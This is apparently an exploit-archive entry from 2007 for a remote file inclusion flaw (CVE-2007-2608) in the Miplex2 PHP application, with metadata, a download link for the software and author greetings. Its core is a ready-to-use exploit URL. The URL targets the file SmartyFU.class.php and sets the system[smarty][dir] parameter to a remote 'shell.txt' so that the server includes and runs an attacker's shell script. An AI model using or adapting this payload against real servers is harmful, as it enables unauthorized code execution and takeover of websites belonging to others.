Miplex2 - 'SmartyFU.class.php' Remote File Inclusion

Author: ThE TiGeR
type: webapps
platform: php
port: 
date_added: 2007-05-07 
date_updated:  
verified: 1 
codes: OSVDB-37789;CVE-2007-2608 
tags: 
aliases:  
screenshot_url:  
application_url: 

#Miplex2 Remote file inclusion

#Download script : http://download.berlios.de/miplex2/miplex2alpha.tar.gz

#Thanks Str0ke

#Exploit :

#http://victim.com/[miplex2_paht]/lib/smarty/SmartyFU.class.php?system[smarty][dir]=shell.txt?

#Discovered by : ThE TiGeR

#Greetz : Reda, â„¢~${{BraveHeart}}$~â„¢

#Miro_Tiger[at]Hotmail[dot]com

# milw0rm.com [2007-05-08]